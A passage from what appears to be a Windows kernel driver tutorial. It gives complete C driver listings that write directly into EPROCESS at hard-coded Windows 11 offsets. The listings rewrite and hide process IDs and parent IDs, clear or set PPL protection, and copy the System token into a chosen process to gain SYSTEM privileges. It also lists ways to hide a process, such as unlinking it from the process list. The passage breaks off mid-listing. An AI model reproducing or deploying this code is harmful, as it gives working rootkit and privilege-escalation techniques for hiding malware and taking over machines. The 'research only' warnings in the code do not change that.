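static int parse_dt(const char *text, dt_field *out, int max)
{
    int n = 0;
    while (*text && n < max) {
        const char *eol = strchr(text, '\n');
        size_t len = eol ? (size_t)(eol - text) : strlen(text);
        char line[256];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, text, len);
        line[len] = '\0';
        text += len + (eol ? 1 : 0);

        const char *plus = strchr(line, '+');
        unsigned off;
        char name[64];
        int consumed = 0;
        if (!plus || sscanf(plus, "+%x %63s :%n", &off, name, &consumed) != 2 || consumed == 0)
            continue;
        const char *type = plus + consumed;
        while (*type == ' ') type++;

        out[n].offset = off;
        strcpy(out[n].name, name);
        strncpy(out[n].type, type, sizeof out[n].type - 1);
        out[n].type[sizeof out[n].type - 1] = '\0';
        out[n].is_bitfield = strncmp(type, "Pos ", 4) == 0;
        n++;
    }
    return n;
}

static int find_member(const char *name)
{
    if (g_nfields < 0)
        g_nfields = parse_dt(kDtOutput, g_fields, MAX_FIELDS);
    for (int i = 0; i < g_nfields; i++)
        if (!g_fields[i].is_bitfield && strcmp(g_fields[i].name, name) == 0)
            return i;
    return -1;
}

/* Offset of a named member, or -1 if the dump does not contain it (bitfield
   entries are not members and are not matched). */
long eprocess_offset(const char *name)
{
    int i = find_member(name);
    return i < 0 ? -1 : (long)g_fields[i].offset;
}

/* Size of a member, derived as the distance to the next entry at a higher
   offset. 0 means unknown (last member); -1 means not found. */
long eprocess_size(const char *name)
{
    int i = find_member(name);
    if (i < 0) return -1;
    unsigned next = 0;
    for (int k = 0; k < g_nfields; k++)
        if (g_fields[k].offset > g_fields[i].offset && (next == 0 || g_fields[k].offset < next))
            next = g_fields[k].offset;
    return next ? (long)(next - g_fields[i].offset) : 0;
}

/* Emits one #define per member the drivers on this page use, with the size as
   a comment so a mismatch is visible at a glance. Returns the number emitted. */
int emit_defines(FILE *out)
{
    static const char *wanted[] = {
        "UniqueProcessId", "InheritedFromUniqueProcessId", "ImageFileName",
        "CreateTime", "ExitStatus", "Token", "Protection", "ActiveProcessLinks",
    };
    int emitted = 0;
    for (size_t i = 0; i < sizeof wanted / sizeof wanted[0]; i++) {
        long off = eprocess_offset(wanted[i]);
        if (off < 0) continue;
        fprintf(out, "#define EPROCESS_%s_OFFSET 0x%lx  // %ld byte(s)\n",
                wanted[i], off, eprocess_size(wanted[i]));
        emitted++;
    }
    return emitted;
}

int main(void)
{
    return emit_defines(stdout) > 0 ? 0 : 1;
}
```

Feed it the full `dt` output of the kernel you are targeting (one file per build number) and compare the generated header against the defines in a driver before loading it; a wrong size on `Protection` or a PID offset that points into `ActiveProcessLinks` shows up immediately.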

# Modifying process information

Every listing in this part writes straight into EPROCESS (direct kernel object manipulation) at the Windows 11 23H2 x64 offsets read from the `dt nt!_EPROCESS` output above. Nothing checks the offsets at run time: on another build the same writes land in unrelated members. The kernel also keeps a second copy of each PID in PspCidTable, the handle table that PsLookupProcessByProcessId and OpenProcess resolve through. The writes below change only the EPROCESS copy, so process enumeration (which reads EPROCESS.UniqueProcessId) and PID lookup disagree afterwards.

## 1. Setting the PID and parent PID to a random value

Besides the two PID writes, this listing sets the process's Protection byte to 0x51 (PPL, Windows signer).

```c
#include <ntifs.h>

// Offsets from the Windows 11 23H2 x64 `dt nt!_EPROCESS` output above.
#define EPROCESS_PID_OFFSET        0x440 // UniqueProcessId              : Ptr64 Void
#define EPROCESS_PPID_OFFSET       0x540 // InheritedFromUniqueProcessId : Ptr64 Void
#define EPROCESS_PROTECTION_OFFSET 0x87a // Protection : _PS_PROTECTION, one byte;
                                         // HangCount/GhostCount bits follow at 0x87b, Flags3 at 0x87c

// Replaces the PID and parent PID stored in the target's EPROCESS with one
// random value and marks the process PPL. Only the EPROCESS copy of the PID
// changes; the PspCidTable entry for the original PID is untouched.
VOID SetProcessInformation(HANDLE Pid)
{
    PEPROCESS pe = NULL;
    NTSTATUS status;
    ULONG seed;
    ULONG newPid;

    if (Pid == NULL) {
        return;
    }

    status = PsLookupProcessByProcessId(Pid, &pe);
    if (!NT_SUCCESS(status)) {
        DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "R0:lookup of PID %u failed: 0x%X\n", HandleToULong(Pid), status);
        return;
    }
    DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "R0:pe:%p\n", pe);

    // rand() does not exist in the kernel; RtlRandomEx takes a caller-owned seed.
    seed = (ULONG)KeQueryInterruptTime();
    newPid = (RtlRandomEx(&seed) % 2996) + 2048;   // somewhere in 2048..5043
    newPid &= ~3u;                                 // real PIDs are multiples of 4

    *(PHANDLE)((PUCHAR)pe + EPROCESS_PID_OFFSET)  = (HANDLE)(ULONG_PTR)newPid;
    *(PHANDLE)((PUCHAR)pe + EPROCESS_PPID_OFFSET) = (HANDLE)(ULONG_PTR)newPid;

    // PS_PROTECTION 0x51: Type = 1 (ProtectedLight), Signer = 5 (Windows).
    // Written as a single byte so the neighbouring bitfields stay intact.
    *((PUCHAR)pe + EPROCESS_PROTECTION_OFFSET) = 0x51;

    ObDereferenceObject(pe);
}

static VOID UnDriver(PDRIVER_OBJECT pDriverObj)
{
    DbgPrint("[-] driver unloaded\n");
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver, PUNICODE_STRING RegistryPath)
{
    DbgPrint("Hello\n");

    // 0xCC is a hard-coded test PID; replace it with the PID of the target process.
    SetProcessInformation((HANDLE)0xCC);
    Driver->DriverUnload = UnDriver;
    return STATUS_SUCCESS;
}
```

## 2. Setting the PID to a fixed value

```c
#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning(disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, x "\n", __VA_ARGS__)

// EPROCESS member offsets, Windows 11 23H2 x64 (from the dt output in section 2).
#define EPROCESS_PID_OFFSET        0x440 // UniqueProcessId
#define EPROCESS_IMAGE_NAME_OFFSET 0x5a8 // ImageFileName
#define EPROCESS_PROTECTION_OFFSET 0x87A // Protection : _PS_PROTECTION (one byte)
#define EPROCESS_FLAGS_OFFSET      0x464 // Flags : Uint4B (not used below)
#define PID_OLD 10660 // PID of the target process, read from Task Manager before loading
#define PID_NEW 10524 // value written over it

VOID UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
}

// Prints PID and image name straight from the EPROCESS.
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %u (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // ImageFileName is 15 bytes and not necessarily NUL-terminated.
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);
}

// Overwrites EPROCESS.Protection (PS_PROTECTION: Type in bits 0-2, Audit in
// bit 3, Signer in bits 4-7); 0 removes PP/PPL protection. EPROCESS lives in
// writable pool memory, so no page protection has to be lifted; the write
// simply bypasses the kernel's own bookkeeping.
NTSTATUS ModifyProcessProtection(PEPROCESS Process, UCHAR NewProtectionValue)
{
    PUCHAR processBase = (PUCHAR)Process;

    // SEH catches faults on probed user-mode addresses only; a wrong offset
    // into kernel memory bugchecks instead of reaching the handler.
    __try {
        UCHAR oldValue = *(processBase + EPROCESS_PROTECTION_OFFSET);
        DebugMessage("qi:Original Protection Value: 0x%X", oldValue);

        *(processBase + EPROCESS_PROTECTION_OFFSET) = NewProtectionValue;

        UCHAR newValue = *(processBase + EPROCESS_PROTECTION_OFFSET);
        DebugMessage("qi:New Protection Value: 0x%X", newValue);

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying process protection: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Rewrites EPROCESS.UniqueProcessId. The write itself succeeds, but only this
// copy changes: PspCidTable still maps the original PID to the object, so the
// process is listed under NewPid (enumeration copies this field) while
// OpenProcess(NewPid) fails, and the CID entry for the original PID can be
// left behind when the process exits. Research use only.
NTSTATUS ModifyProcessId(PEPROCESS Process, HANDLE NewPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        HANDLE oldPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Original PID: %u (0x%X)", HandleToULong(oldPid), HandleToULong(oldPid));

        DebugMessage("qi:WARNING: rewriting UniqueProcessId; the CID table is not updated");

        *(PHANDLE)(processBase + EPROCESS_PID_OFFSET) = NewPid;

        HANDLE verifyPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:New PID: %u (0x%X)", HandleToULong(verifyPid), HandleToULong(verifyPid));

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Looks up the process with PID_OLD, clears its protection, then changes its PID.
VOID TryModifyProcess(VOID)
{
    PEPROCESS processObject;
    NTSTATUS status;

    status = PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)PID_OLD, &processObject);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find process with PID %u, status: 0x%X", PID_OLD, status);
        return;
    }

    DebugMessage("qi:Found process with PID %u:", PID_OLD);
    PrintProcessInfo(processObject);

    DebugMessage("qi:Attempting to modify process protection...");
    ModifyProcessProtection(processObject, 0x00); // clear PP/PPL

    DebugMessage("qi:Process info after modification attempt:");
    PrintProcessInfo(processObject);

    DebugMessage("qi:Attempting to modify PID...");
    ModifyProcessId(processObject, (HANDLE)(ULONG_PTR)PID_NEW); // PID_OLD -> PID_NEW

    ObDereferenceObject(processObject);
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    DebugMessage("qi:WARNING: This driver modifies internal Windows structures");
    DebugMessage("qi:WARNING: FOR RESEARCH PURPOSES ONLY - Do not run on production systems");

    TryModifyProcess();

    return STATUS_SUCCESS;
}
```

## 3. Setting the PID and parent PID to fixed values

```c
#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning(disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, x "\n", __VA_ARGS__)

// EPROCESS member offsets, Windows 11 23H2 x64 (from the dt output in section 2).
#define EPROCESS_PID_OFFSET        0x440 // UniqueProcessId
#define EPROCESS_IMAGE_NAME_OFFSET 0x5a8 // ImageFileName
#define EPROCESS_PROTECTION_OFFSET 0x87A // Protection : _PS_PROTECTION (one byte)
#define EPROCESS_FLAGS_OFFSET      0x464 // Flags : Uint4B (not used below)
#define EPROCESS_PARENT_PID_OFFSET 0x540 // InheritedFromUniqueProcessId
#define PID_OLD  0x7BC  // PID of the target process, read before loading
#define PID_NEW  0x1399 // value written over the PID
#define PPID_NEW 0x1999 // value written over the parent PID

VOID UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
}

// Prints PID and image name straight from the EPROCESS.
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %u (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // ImageFileName is 15 bytes and not necessarily NUL-terminated.
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);
}

// Overwrites EPROCESS.Protection (PS_PROTECTION: Type in bits 0-2, Audit in
// bit 3, Signer in bits 4-7); 0 removes PP/PPL protection. EPROCESS lives in
// writable pool memory, so no page protection has to be lifted.
NTSTATUS ModifyProcessProtection(PEPROCESS Process, UCHAR NewProtectionValue)
{
    PUCHAR processBase = (PUCHAR)Process;

    // SEH catches faults on probed user-mode addresses only; a wrong offset
    // into kernel memory bugchecks instead of reaching the handler.
    __try {
        UCHAR oldValue = *(processBase + EPROCESS_PROTECTION_OFFSET);
        DebugMessage("qi:Original Protection Value: 0x%X", oldValue);

        *(processBase + EPROCESS_PROTECTION_OFFSET) = NewProtectionValue;

        UCHAR newValue = *(processBase + EPROCESS_PROTECTION_OFFSET);
        DebugMessage("qi:New Protection Value: 0x%X", newValue);

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying process protection: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Rewrites EPROCESS.UniqueProcessId. Only this copy changes: PspCidTable still
// maps the original PID to the object, so the process is listed under NewPid
// while OpenProcess(NewPid) fails, and the CID entry for the original PID can
// be left behind when the process exits. Research use only.
NTSTATUS ModifyProcessId(PEPROCESS Process, HANDLE NewPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        HANDLE oldPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Original PID: %u (0x%X)", HandleToULong(oldPid), HandleToULong(oldPid));

        DebugMessage("qi:WARNING: rewriting UniqueProcessId; the CID table is not updated");

        *(PHANDLE)(processBase + EPROCESS_PID_OFFSET) = NewPid;

        HANDLE verifyPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:New PID: %u (0x%X)", HandleToULong(verifyPid), HandleToULong(verifyPid));

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Rewrites EPROCESS.InheritedFromUniqueProcessId. This member is only reported
// back to user mode (ProcessBasicInformation, SystemProcessInformation), so the
// write changes what tools show as the parent and nothing else.
NTSTATUS ModifyParentProcessId(PEPROCESS Process, HANDLE NewParentPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        HANDLE oldParentPid = *(PHANDLE)(processBase + EPROCESS_PARENT_PID_OFFSET);
        DebugMessage("qi:Original Parent PID: %u (0x%X)", HandleToULong(oldParentPid), HandleToULong(oldParentPid));

        *(PHANDLE)(processBase + EPROCESS_PARENT_PID_OFFSET) = NewParentPid;

        HANDLE verifyParentPid = *(PHANDLE)(processBase + EPROCESS_PARENT_PID_OFFSET);
        DebugMessage("qi:New Parent PID: %u (0x%X)", HandleToULong(verifyParentPid), HandleToULong(verifyParentPid));

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying Parent PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Looks up the process with PID_OLD, clears its protection, then rewrites its
// parent PID and PID.
VOID TryModifyProcess(VOID)
{
    PEPROCESS processObject;
    NTSTATUS status;

    status = PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)PID_OLD, &processObject);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find process with PID 0x%X, status: 0x%X", PID_OLD, status);
        return;
    }

    DebugMessage("qi:Found process with PID 0x%X:", PID_OLD);
    PrintProcessInfo(processObject);

    DebugMessage("qi:Attempting to modify process protection...");
    ModifyProcessProtection(processObject, 0x00); // clear PP/PPL

    DebugMessage("qi:Process info after modification attempt:");
    PrintProcessInfo(processObject);

    DebugMessage("qi:Attempting to modify parent PID and PID...");
    ModifyParentProcessId(processObject, (HANDLE)(ULONG_PTR)PPID_NEW);
    ModifyProcessId(processObject, (HANDLE)(ULONG_PTR)PID_NEW);

    ObDereferenceObject(processObject);
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    DebugMessage("qi:WARNING: This driver modifies internal Windows structures");
    DebugMessage("qi:WARNING: FOR RESEARCH PURPOSES ONLY - Do not run on production systems");

    TryModifyProcess();

    return STATUS_SUCCESS;
}
```

## 4. Hiding the process ID

Set the PID to 0 or NULL.

```

## 5. Erasing several pieces of process information?

1. Process name
2. Path
3. PPID
4. Unlinking (from the process list)
5. PID
6. Handles
7. OwnerProcessId

# Copying the System process Token to another process to elevate its privileges

## 1. Copying the System process Token to another process

1. Write user-mode code to test whether privileges were elevated; it can spawn a new cmd.exe for inspection.

  1. Run it

  2. Note the PID

  3. Write the driver code

```c
#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__)

// EPROCESS structure offset definitions
#define EPROCESS_PID_OFFSET 0x440        // Offset of the UniqueProcessId field
#define EPROCESS_TOKEN_OFFSET 0x4b8      // Offset of the Token field
#define EPROCESS_IMAGE_NAME_OFFSET 0x5a8 // Offset of the ImageFileName field
#define PID 8960

// Driver unload function (a DriverUnload routine returns VOID)
VOID UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
}

// Print the key information of a process
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    // Get the process ID
    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %d (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // Get the process name
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);

    // Get the Token address
    ULONG_PTR tokenPtr = *(PULONG_PTR)(processBase + EPROCESS_TOKEN_OFFSET);
    DebugMessage("qi:Process Token: 0x%llX", tokenPtr);
}

// Copy one process's Token to another process
NTSTATUS CopyProcessToken(PEPROCESS SourceProcess, PEPROCESS TargetProcess)
{
    PUCHAR sourceBase = (PUCHAR)SourceProcess;
    PUCHAR targetBase = (PUCHAR)TargetProcess;

    __try {
        // Get the source process's Token
        ULONG_PTR sourceToken = *(PULONG_PTR)(sourceBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Source Process Token: 0x%llX", sourceToken);

        // Get the target process's original Token
        ULONG_PTR originalTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Original Target Process Token: 0x%llX", originalTargetToken);

        // Copy the Token - warning: this is a high-risk operation!
        DebugMessage("qi:WARNING: Attempting to copy process token - THIS IS A HIGH RISK OPERATION!");
        *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET) = sourceToken;

        // Verify the modification
        ULONG_PTR newTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:New Target Process Token: 0x%llX", newTargetToken);

        if (sourceToken == newTargetToken) {
            DebugMessage("qi:Token successfully copied!");
        }
        else {
            DebugMessage("qi:Token copy failed!");
        }

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while copying token: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Attempt to copy the System process's Token to the target process
VOID TryTokenElevation()
{
    PEPROCESS systemProcess = NULL;
    PEPROCESS targetProcess = NULL;
    NTSTATUS status;

    // Look up the System process (PID 4)
    status = PsLookupProcessByProcessId((HANDLE)4, &systemProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find System process (PID 4), status: 0x%X", status);
        return;
    }

    // Look up the target process by PID
    status = PsLookupProcessByProcessId((HANDLE)PID, &targetProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find target process with PID 0x%X, status: 0x%X", PID, status);
        ObDereferenceObject(systemProcess);
        return;
    }

    // Print the initial information
    DebugMessage("qi:System process info:");
    PrintProcessInfo(systemProcess);

    DebugMessage("qi:Target process info:");
    PrintProcessInfo(targetProcess);

    // Attempt to copy the Token
    DebugMessage("qi:Attempting to copy System token to target process...");
    status = CopyProcessToken(systemProcess, targetProcess);

    if (NT_SUCCESS(status)) {
        DebugMessage("qi:Token copy operation completed. Target process info after modification:");
        PrintProcessInfo(targetProcess);
    }
    else {
        DebugMessage("qi:Token copy operation failed with status: 0x%X", status);
    }

    // Release the process object references
    ObDereferenceObject(systemProcess);
    ObDereferenceObject(targetProcess);
}

// Driver entry function
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // Severe warning
    DebugMessage("qi:WARNING: This driver attempts to copy process tokens");
    DebugMessage("qi:WARNING: FOR RESEARCH PURPOSES ONLY - Do not run on production systems");
    DebugMessage("qi:WARNING: This will likely trigger security alerts and may crash the system");

    // Attempt to elevate the process's privileges
    TryTokenElevation();

    return STATUS_SUCCESS;
}
```
  1. Load the driver
  2. Create a new cmd.exe process from the user-mode application
  3. Check in cmd.exe whether it runs with SYSTEM privileges.
  4. Run it as a normal user and as an administrator respectively. Alternatively, after elevation inject a DLL whose only job is to create a new cmd.exe process.

## 2. Copying the System process Token to another process and changing its process ID to 4

```c
#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__)

// EPROCESS structure offset definitions
#define EPROCESS_PID_OFFSET 0x440        // Offset of the UniqueProcessId field
#define EPROCESS_TOKEN_OFFSET 0x4b8      // Offset of the Token field
#define EPROCESS_IMAGE_NAME_OFFSET 0x5a8 // Offset of the ImageFileName field
#define PID 7536                         // Target process PID

// Driver unload function (a DriverUnload routine returns VOID)
VOID UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
}

// Print the key information of a process
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    // Get the process ID
    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %d (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // Get the process name
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);

    // Get the Token address
    ULONG_PTR tokenPtr = *(PULONG_PTR)(processBase + EPROCESS_TOKEN_OFFSET);
    DebugMessage("qi:Process Token: 0x%llX", tokenPtr);
}

// Copy one process's Token to another process
NTSTATUS CopyProcessToken(PEPROCESS SourceProcess, PEPROCESS TargetProcess)
{
    PUCHAR sourceBase = (PUCHAR)SourceProcess;
    PUCHAR targetBase = (PUCHAR)TargetProcess;

    __try {
        // Get the source process's Token
        ULONG_PTR sourceToken = *(PULONG_PTR)(sourceBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Source Process Token: 0x%llX", sourceToken);

        // Get the target process's original Token
        ULONG_PTR originalTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Original Target Process Token: 0x%llX", originalTargetToken);

        // Copy the Token - warning: this is a high-risk operation!
        DebugMessage("qi:WARNING: Attempting to copy process token - THIS IS A HIGH RISK OPERATION!");
        *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET) = sourceToken;

        // Verify the modification
        ULONG_PTR newTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:New Target Process Token: 0x%llX", newTargetToken);

        if (sourceToken == newTargetToken) {
            DebugMessage("qi:Token successfully copied!");
        }
        else {
            DebugMessage("qi:Token copy failed!");
        }

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while copying token: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Attempt to modify the process ID - an extremely dangerous operation that will almost certainly crash the system
NTSTATUS ModifyProcessId(PEPROCESS Process, HANDLE NewPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        // Record the original PID
        HANDLE oldPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Original PID: %d (0x%X)", HandleToULong(oldPid), HandleToULong(oldPid));

        // Severe warnings
        DebugMessage("qi:EXTREME DANGER: Attempting to modify PID to 4 (System)");
        DebugMessage("qi:EXTREME DANGER: This will cause immediate system instability");
        DebugMessage("qi:EXTREME DANGER: System crash is virtually guaranteed");

        // Modify the PID - this is a fatal operation
        *(PHANDLE)(processBase + EPROCESS_PID_OFFSET) = NewPid;

        // Verify the modification - the system may already have crashed before this point
        HANDLE verifyPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Attempted New PID: %d (0x%X)", HandleToULong(verifyPid), HandleToULong(verifyPid));

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// Attempt to copy the System process's Token to the target process and change the target's process ID to 4
VOID TrySystemImpersonation()
{
    PEPROCESS systemProcess = NULL;
    PEPROCESS targetProcess = NULL;
    NTSTATUS status;

    // Look up the System process (PID 4)
    status = PsLookupProcessByProcessId((HANDLE)4, &systemProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find System process (PID 4), status: 0x%X", status);
        return;
    }

    // Look up the target process by PID
    status = PsLookupProcessByProcessId((HANDLE)PID, &targetProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find target process with PID 0x%X, status: 0x%X", PID, status);
        ObDereferenceObject(systemProcess);
        return;
    }

    // Print the initial information
    DebugMessage("qi:System process info:");
    PrintProcessInfo(systemProcess);

    DebugMessage("qi:Target process info:");
    PrintProcessInfo(targetProcess);

    // Step 1: attempt to copy the Token
    DebugMessage("qi:Step 1: Attempting to copy System token to target process...");
    status = CopyProcessToken(systemProcess, targetProcess);

    if (NT_SUCCESS(status)) {
        DebugMessage("qi:Token copy operation completed. Target process info after token modification:");
        PrintProcessInfo(targetProcess);

        // Step 2: attempt to modify the process ID - extremely dangerous
        DebugMessage("qi:Step 2: Attempting to modify target process ID to 4 (System) - EXTREMELY DANGEROUS");
        DebugMessage("qi:This will likely cause an immediate system crash");

        status = ModifyProcessId(targetProcess, (HANDLE)4);

        if (NT_SUCCESS(status)) {
            DebugMessage("qi:Process ID modification attempt completed - If you're seeing this message, it's surprising");
            PrintProcessInfo(targetProcess);
        }
        else {
            DebugMessage("qi:Process ID modification failed with status: 0x%X", status);
        }
    }
    else {
        DebugMessage("qi:Token copy operation failed with status: 0x%X", status);
    }

    // Release the process object references
    ObDereferenceObject(systemProcess);
    ObDereferenceObject(targetProcess);
}

// Driver entry function
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // Extreme warnings
    DebugMessage("qi:EXTREME DANGER: This driver attempts to copy System token AND modify process ID");
    DebugMessage("qi:EXTREME DANGER: THIS WILL CRASH YOUR SYSTEM");
    DebugMessage("qi:EXTREME DANGER: FOR RESEARCH PURPOSES ONLY - Do not run on any system you care about");

    // Attempt to elevate the process's privileges and modify its PID
    TrySystemImpersonation();

    return STATUS_SUCCESS;
}
```

## 3. Copying a process Token to another process and changing its process ID

```c
#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__)

// EPROCESS structure offset definitions
#define EPROCESS_PID_OFFSET 0x440        // Offset of the UniqueProcessId field
#define EPROCESS_TOKEN_OFFSET 0x4b8      // Offset of the Token field
#define EPROCESS_IMAGE_NAME_OFFSET 0x5a8 // Offset of the ImageFileName field
#define PID_OLD 4768                     // Target process PID
#define PID_NEW 10072                    // New PID

// Driver unload function (a DriverUnload routine returns VOID)
VOID UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
}

// Print the key information of a process
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    // Get the process ID
    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %d (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // Get the process name
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);

    // Get the Token address
    ULONG_PTR tokenPtr = *(PULONG_PTR)(processBase + EPROCESS_TOKEN_OFFSET);
    DebugMessage("qi:Process Token: 0x%llX", tokenPtr);
}

// Copy one process's Token to another process
NTSTATUS CopyProcessToken(PEPROCESS SourceProcess, PEPROCESS TargetProcess)
{
    PUCHAR sourceBase = (PUCHAR)SourceProcess;
    PUCHAR targetBase = (PUCHAR)TargetProcess;

    __try {
        // Get the source process's Token
        ULONG_PTR sourceToken = *(PULONG_PTR)(sourceBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Source Process Token: 0x%llX", sourceToken);

        // Get the target process's original Token
